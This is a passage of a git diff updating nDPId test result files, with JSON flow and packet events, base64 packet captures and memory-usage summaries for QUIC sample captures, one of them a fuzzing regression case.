Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1607938456566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1607938456566,"pkt":"AAAAAAAAAAAAAAAAht1gLBAvBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvI5gTYBOuKAAAAAQijB72XkxHdoQg7VxcI2Jvc+wBAmyNACkF8YFqpKbrULKoDb19+uZg6qvjJtwEJ\/uOaQSa3OSU6O4kzdS3stlDlI1x0pxU6U1p+48IkszqoivEYtB69bd+ITaYbTkxaelp3jMONrgP7+RVKaRNSt1HkpjhOcLPrzWczoHNZnIhNfvDy2JT2t08AucggcJe2\/4B\/vdnrtpqK6V\/yqwGFTMu1rQIkxS92C6tKauoy9+VqrwAAAAEIowe9l5MR3aEIO1cXCNib3PtEAuCsTgG\/NlsvOl6GJP2fa9o99BT145OKWZuTcmr433tc4jI7eA6S9XkiunJFKo6ZwPI0CMllqhzpZg\/M2oExoGin\/1BGN9cmCUQfuYgNqfFCtG+9ndT9HYjrsBCdjtJLmxL7rPr9q0tjGpDyuXZi9R4mNROPUrln\/PkhZzgiM0sHtdd5p\/bNeUYtEqE7ldAVt6\/n44lU+YN3SU+JWXbqssVrfvVzr36h3ab7fYZ2wDsFWfe3UAXx72w0FuOOYB7+7UQe00b5Z0z5SyfSm4P9dPYqojw9+jCHeJHd8IAkR4khzwJfJ3q7ZLCXjemRtbjS+jOnIFHSC581L8cRfFE0puRn3ZcyA6eigK1\/b\/IulmnDweMhm5uzPfRzVpuYtDAmfupBBO\/lq0x9UE6G6aXlrZk5pUsV\/Pqkms2\/6G+WtFFZQVjHMyjk00Lt801D4RBFQF6Pahphh1rFyerbrHyGpVjzLCCjQyphY+Ef9GwnSwZSXfDtl5l6V75F8hdBb7eRQwoSsYy2TAPUn+5EgUUMa1L0FdqwqulhpTwuiKxlEjCwVmTxOQ9cg0ckmklTggiUpDihR6CGEJh4wbwQvtSQI7moaNImb3zhI+1KDCqOesSmC0luDPiQ6HVXRRmZBTcfdXaVe6yn8aOTSuCvFQcYVZJMmDXWA3tjd8oaA17lJRBbd52Hesk8cJ\/YJxx85q2dKnHlb3PDDd1GsYUOHckqW9oBPW3OnKOCPAmLbdAwZewxw5NCtlvRr65YuEBJebGFHlf1HDlzUGnZEYOFz7QCUVI0Cm1TQGPnrse0LdnJMU4XAsVFTZ0rmN1WZ7lpL6siOc2kDO70InGs0erREqxP56ACsZJMVSLIWh+Wtd1TXT7s1cqcJTYFE1niy2vrWekG6gLj5S6d+RexzQMJFxrY7r+11SACpmCHMFInRkZ2X9ItKQsY5EbZalkFRVlIPVyM4egzMKz9sn52T\/vMFKgNzwFrf2sp17iUQaz1IyM4BWPhByUmfVEtsPpNhTudVAjT+DAK93H3WyrArXi\/C2kIO6kQjQL8MrdQf21Vn+lMg29055+PrObIIyJyGedJEXiBJHhcPUZyzw5wKIN3qGujdkkwR3NWZGQsR9D9oFcHebuLVvyY9rfcmZsewBxwBuE+3j7ZET5hnurVax3LpMwvKOC7lHimTxsExq+Apn9MfGeNafcclrRpd8qOhu5Y\/D9oPxLb43JPWxWrwE9\/H\/\/i9MLl+t0zWNInh13oyE1g07E++NmYobon6Smh\/KGoGULC6seHfmLDTFHYkzCH+jMiW6zoYiu7MVxzW\/pT13bjivVb6\/E5Iu6Gt0D2z7Y6bkUG7P9GxtXA2I4cOhOe8m7St\/U9gg=="} 01473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1607938456566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":805,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":805,"pkt_l4_len":751,"thread_ts_msec":1607938456566,"pkt":"AAAAAAAAAAAAAAAAht1gLBAvAu8RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvI5gLvAwKiAAAAAQijB72XkxHdoQg7VxcI2Jvc+0EX7RIgJstg2q\/pC81tAEQflatapq\/RZQEybKUVkOQrHxIiM3xbz3ZbafCyVgp9YFd+JrcvMCpFHqt9ha4UaWT\/CVOhVDMl+x8Qz2Pi7UbhXXzBIpETH8Z7GAVhwJp3720klhijkJwcoDMcJhlagIc47WtHZyC2\/NvYhyD6pe18qYPoUjuwqv+wJE\/ZuFV52ejpLWx76nNhIhGaoM22WiUW2N20UYQh0kubnK8ydedmguDEIxF73mmjfBjQU7d+\/kjc6w69nvaNM1WUtVe+1pIxu53jikC+jWmnb37byYPq9yuXiC3\/7jLmxfDtd9m0NACttAKJA\/JNnc1mj5nC7Y4hcumqIR3HrbC6nuLoYsXX2Zp0f9UgYV0fEqMHvZeTEd2hiKBY6bJdCuJKiCqdgeiTl8HqX5mvvlLWJPlmCEJCqIrxf4AkkUVGE4BSMBWdBgCOEniMLjdilc+qHYhwYNZ7tIGoZF6d6e+Y9Yje+rmHUnbpVz7jAirlBT5H70Gx8i7gxMgFdddmzogwCmelHc7wvmzlC3bbPNEkyFgFvBjt104z4kXXH0FdVNTjvLWqMrMbCISgSyaKcGImnAuSczuqI+IdDAVMV3KZetnbRYTODT0MnkiyhjZS2c2FGhXiSczCoL+nOf5G7u0IMQ1S2B5gWkWA4zkPvuFc+aQWgo\/5D9qUsPB6Q6\/Lj7MI5fOlLauhfzQmW9GNJRpuqdg3\/ZmECJ9z4HnHnfJd1luO6tXDuMawQhxYeD2xpO\/QqBEAH7sAsFTq\/abn1uTe8vqVNYsZRf0hwJAKRW\/BJxg25OGxhUlcywIb3vGZoq+dJmTxYWX\/eqXVDs+dco62ygOlroB9wJoypHt\/D+y7eYcgKaWYE3hnP28kNmmEQuWhfqoLHNJTZas1p5oY5kezaxnU27xSuQXqGdvZdYxhIaICM8EHXUKIOqW8fx5oue03v9+86w=="} -00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":992,"flow_first_seen":1607938456563,"flow_last_seen":1607938456578,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1279218,"flow_avg_l4_payload_len":1289,"midstream":0,"thread_ts_msec":1607938456578,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":992,"flow_first_seen":1607938456563,"flow_last_seen":1607938456578,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1279218,"flow_avg_l4_payload_len":1289,"midstream":0,"thread_ts_msec":1607938456578,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","packets-captured":992,"packets-processed":992,"total-skipped-flows":0,"total-l4-payload-len":1279218,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1607938456578} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 992/992 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908385 bytes -~~ total memory freed........: 5908385 bytes -~~ total allocations/frees...: 119127/119127 +~~ total memory allocated....: 6042019 bytes +~~ total memory freed........: 6042019 bytes +~~ total allocations/frees...: 121889/121889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2144 chars diff --git a/test/results/quic-34.pcap.out b/test/results/quic-34.pcap.out index 60232247c..1acdd25de 100644 --- a/test/results/quic-34.pcap.out +++ b/test/results/quic-34.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1646827637244} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646827637244,"flow_last_seen":1646827637244,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1646827637244,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1646827637244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1646827637244,"pkt":"CAAnfrFjCgAnAAAACABFAgUATWVAAEAR9m3AqDgBwKg4xtpIEVsE7ChNxv8AACIIoSj95jI1XLcIjUy3QAcovkkARMqtPUg7uXRSK4kMXX53Es5onLzxtRemVGyuMExaFbMut6vDuqB2U\/DpzOfUlq0FvRt9rUJpjW6yDtUJ\/70ztz+CDYIV8VpKhQLQtYfPD3mmkKn2FxkrrQO4KafazVucb4cvV7T4N0u43AnJcMtc4d\/GXnMaac4VfAlfHe4y11Dgg0O+0aKijzEWoPXxyRR4t51aC7Nkbv\/0J5dgWKDBQk9w37dytb5zwjbfQHpRVluNBzZHs5I4DMZ\/JnNB+PrUyuyBmXrp0gR2XnwVjzQ3flNPFgcQgu2\/JTVF0L13Ckxt\/+QZlc9B3wBoysEquMpFluVCxlhpsJNoFK7jPg3r2c+uxRQG0p8pcZpnvTksWL+f8WqFT5coLPPdZlZwBn02RKfGTA+uAZ0LaE0O1ka34WEpgqpoVc8fayaTadrjLyO\/JlS+dq\/Kdd3y9KPe38jjexcirOrW1+qlPzhwIx8piSprhOCyEQY2+fljrQNCpUoPKvzdasj+8Y\/vgOi4aANXTAspd+NPZCshlwQpGBYQdC7CEZbf5QlwUnySFyecnPIsokfcy7EJCJxGVFXATop39f5agqqDgJBBxbV7Vy06FK1qkx\/0u8uhGfVjqVKRKmprwi9X1kSSqhXt2GH8bZxjiM01oC4BQV78N199Rg9tYJupRv8l6yvhDS9rct08zWWNVxr58lebQUaKNYadQRmZaFtRmnN0sxjkvcxweUxbZooL7E4GGIqIljR4ZhLlzlK3E7B66OJGtQAC7VyR46GafnwhTxp3HrOyLyoZp0Rw7xcWItz9Tv6lT2BoA4Y0DSNY9olTp+DPyrMnUG0vqRxzRhJ8374jg6MVKZMEa\/87MY2irhA8kK8hZoC3M19FTaOnneltuWAhMrf+Q8t8BAlD7kUkH6oHx9vkYnEZiK9+\/sfx6Qq8taGMG\/mcWDWaYEb3NXAZqmf41FHteU\/OwdmlZSqoqDS5DlVhB2wq7tLwmLKxoxTkhjVXaunTU\/kfczBDm1AwklxFw3Hw5J5l+LHrwOolcProF6qLDBkbDOvOptyE1ll3vB0t4SH06Wr36sHzRz1uCQR21A9SHZvKyJK\/SCg1uApsLqdmJZ1f\/+1id8zTEwjq1qmsHED38lQ4CrlbWfoLvOR3f3s\/z\/QkitvfGtHhVZt0j0WepakKe07\/NGHX1V0dM0mTgqZKJh2Io3kvFvctAo6sUjbANXF0S8wxlOujZbFzW1LOki1CXDYWdPlq+SJtyeBxUEDNzFZ71VrbnwsnJNOpHvvMzPqdRV+ndVLZfpyQXSEsFc65QVoQNOu0MGerIkZa7wLe0y4mX0pnI8L\/R\/y1JTawqiJeeUx8r1l44ku\/g3ZE2uSVEJxuuTdY8TSHXRMxr7nqZuOWpvSIaUcGS3Q1TZnsiOTFYcvBWzEbQ72OmSRWUJzCCABBzidjiDpGWzPkhe8\/ROyjlc\/5TRQg67rXC2fAj53uXQRWw3a6jszT4xodZsJKooKIos5G3CpYzzQSJCrtOeOr5\/ce4c+q3Hx2rzKhdgv5WRhVAr2UV23TNUJd0OkmVeoZzs9v+FDb0PtPPYVDKHvjJqHAzOy1dUyjTbdc+UjRQ\/Xh3vEMPhsnnFc+0+ln6b2hntZL0z9eF8yMJK4KNw=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646827637244,"flow_last_seen":1646827637244,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1646827637244,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646827637244,"flow_last_seen":1646827637244,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1646827637244,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1646827637247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1646827637247,"pkt":"CgAnAAAACAAnfrFjCABFAgUAqq4AAEAR2STAqDjGwKg4ARFb2kgE7EgDif8AACIIjUy3QAcovkkIkbyxu2YmbzcAQJwuFyenENUqJ+JAUUd0pzPM6YfLXJbr4Ls6WaBQnpeEVYscLYmqST86NZIZE4bUhuMV7nVVeeqYe8GuuwtatPAGGTW6q7p5GlzaMgwDpbi8BdNdLtW13Hqdt9WnjpqVBlTPXGjJKFNPYUL1p5wtvsDZQ4TlC3npqKXhES1sS6J094lDKZtXU+v7T8eCFSNuI7Td4nHjGGqNqUKgJSus\/wAAIgiNTLdAByi+SQiRvLG7ZiZvN0QVSPjoxHY6BY1VSgy5etewIoW+11THSEpbinUyFsFkXsGASC8punYhUcJKCOC4rBIzaCstKMtMJHeFT+sUXNNib04LBnzYQKYceojlYPsGe5Ro3OtptLvx4kbgnpc62cqQ1nxvDHT\/fJKWJpgJvoU08oiVUiGs3B1bAvXl\/Wd+wkAF\/wAEMtHf7gZ1kaIq4RaPvn5a9A7UzqeEBuYGDShEpWXMe8q8vuDy24QsQNetariaa4kyNHYl4QdNhygXx\/G6ImAU3U1WThFZHC7AGd0gIgLIGzJf\/9m58rpSdM8Ie6D0sH7LUz+QS+Z4XNqqQcfZPaTaAVOFR6VUyiMeaj3F8bkj\/3MFBH1Z7mXRy8N0qVksEG1OlaU1eLaFjqcM9ZlnatIXhDVNsU98jz1VfTd5sFlnZuyyy7JoZ94aXeRH\/zazdoWlaXePukQ+pl9yYFQPdkgJYi+xKQurw0sw\/SIjNt6qV1Kt0\/FKxwfio1WQ7xlNXzsikFbr81oDdnzQYE6rGMYuxy0RnbfRhLVdsGTc9\/tp7zhIS4DV21JLjrv9UwKPcwJ4JD\/1Rxmkn3Jgw\/xQKXSa6JKSiLv0t\/weF0kbZssWUTcVDcUkDhsJSAH0njJoT2cFwm4lWcM5\/27nvncmYaxDvQXBfFPVW+m3Kwufpk8Xq\/eZbeo\/gSSLUYZOuQu+1ySiHDi5lLzsrpugFKrtUw8ayavMdKrm7oT2ZHXYsRczEGy\/6j7hln+rc24EWxZc0x2eirzNMVxjgu\/0CooTXqD4vghqN1FykIiDm0ZniCVUNexnbGWB7jTgFGcio0\/OnikmQ4dYt56aiM9sIGNcOvsTnFVh+cqJS5HY98vC1U2OBDew6qoIOHDQ21GKLwwRZV1T6U5f6o+37jaPoC1trLLadI2tORnFYqRZm7glwbD9lNFVr+PbofAndUgCf6Zk2CDaE686Awtk3d4hYhQQ3WNznovhVpr8uhbkmAY+WL7y023sNxtRIBnWlXFZPHQuiB37VW1mvmc13p6ljSnKt94wjvyH1FOprPa3tga3zWcYEvWdg5Xqw1ju7gmEzi+VGOvWFAXTzHEhgyFz4BPL84om6p0ALU6sMz8ZdCVqy3kojlACSWsh5\/A6tV3eZJDcnfn7IV6RS+dpvmNwYoFMJn6YSfH1ddeM9mWwCcbnxFV4aWagX1z8fcqVLI6IMYAb37L0\/zdSO2uZe\/h4kSA2SLJTWfPj+TnqT2qI8MlPDZYgXs2XiIdxOOzSUnZDmRgGIMADHBZPrEl6WERC1eVKU\/qCzCib8\/Q0YyKXEfqbm+ia9lXh1\/rbg1B\/\/CXdzCHVzZc3ir8TnofN+5SG6M6PapINQPVY7HwnTlqNqDNVMVGtlLYsPe7LMJnAoGEI2aKSrQZRaA=="} 01412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1646827637247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"thread_ts_msec":1646827637247,"pkt":"CgAnAAAACAAnfrFjCABFAgLwqq8AAEAR2zPAqDjGwKg4ARFb2kgC3Huyr\/8AACIIjUy3QAcovkkIkbyxu2YmbzdBBIfexsm7espBXzGKaZrAS7pggZDUUIfbdQ\/09SYdxmJiPOboVA5GNyIN0WKEZEb2ChDB1GilmJgW7Qp24EMucpJ8B17AVuDTPfEx7nyxUZnDxLnOV1NZxSPDEwEtlJluh20qRikrub3PX5DmXIcRaHLRejZJ9hsaCYWsq6n5Gfas0GF7MLGzHn117Y0pGUO2eqVFiwenMssI9+ug1E1aDiNVvZMQKSFdyDe9LiLFeCdes2+kAlg73TsTCPbewTMdEgVZBgLZaqO0un1mix5Qt6BKTBkVA8VSZ95v+EfSMYEwA9xZi0jAFqqTGyp+ZP95tU0r4nGCl85tIQDBKXfcBXQge764C41Mt0AHKL5JAwe7F8jwhPqhtghmuHu5o5uyPLm0TwLbmCTREzsDZ3DsGt5qVRU9QIvOhWBrh4V4uljh\/BtTxVptxRkCktu+NWT04G8qsIYXDgRKJUfYMbGUdCKTsE7gC0FAzqopaBfgolmLGZhX7ZxOjTG5NpEGFq+sEmPjGPlDauhq8NTECzVYfToMEehRp8C3bVLHR8m\/W+k90FLQ1TlaEbOqjuZyM\/9ouIFSCmQMPUymc3wxlPi0V28D1yaErAIjX4TP0GolGAZO78ybzC72YMWFqgmnosw3ju1DxFOnMm4S5978OZU\/wmbSWd91srzQp2fOyLvD3wvvNCgP73nEBs88atgYEK5VcrbDFNBrhyEvYixxRMTIqYTLkuWudZVMFEpbA6nhu6WPpaKYD3hORyKUUBLP\/t\/DIvXUYAsZ4s7fmfApFG7wJnzGak9JU7Tkzy0XAM9yEGedigZBltqQA4wPLvuXascBjTXzqxcRPwVbbiOpsQwIpMGnMJz4+XgHNI2WaH8iPl9H\/sYwWUugeEAk511PGx++JwUxDqTYxBlG36Eym55D9c1vN\/8RDw+9AAMguw=="} -00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646827637244,"flow_last_seen":1646827637247,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4668,"flow_avg_l4_payload_len":1167,"midstream":0,"thread_ts_msec":1646827637247,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic-34.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646827637244,"flow_last_seen":1646827637247,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4668,"flow_avg_l4_payload_len":1167,"midstream":0,"thread_ts_msec":1646827637247,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":55880,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"quic-34.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":4668,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1646827637247} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879835 bytes -~~ total memory freed........: 5879835 bytes -~~ total allocations/frees...: 118139/118139 +~~ total memory allocated....: 6013469 bytes +~~ total memory freed........: 6013469 bytes +~~ total allocations/frees...: 120901/120901 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2142 chars diff --git a/test/results/quic-fuzz-overflow.pcapng.out b/test/results/quic-fuzz-overflow.pcapng.out index 419eb2d19..0bba4ec95 100644 --- a/test/results/quic-fuzz-overflow.pcapng.out +++ b/test/results/quic-fuzz-overflow.pcapng.out @@ -2,8 +2,8 @@ 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633957625000} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3} 03011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633957625000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1280,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1280,"pkt_l4_len":1260,"thread_ts_msec":1633957625000,"pkt":"RSAFACAgIAAgESAg\/\/\/\/\/\/\/\/\/yAgICAgICAgIMhRMDI0ICAgICAgICAgICD\/\/yD\/\/\/\/\/\/yAgIAAAoAEgBENITE8gACAgVUFJRP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/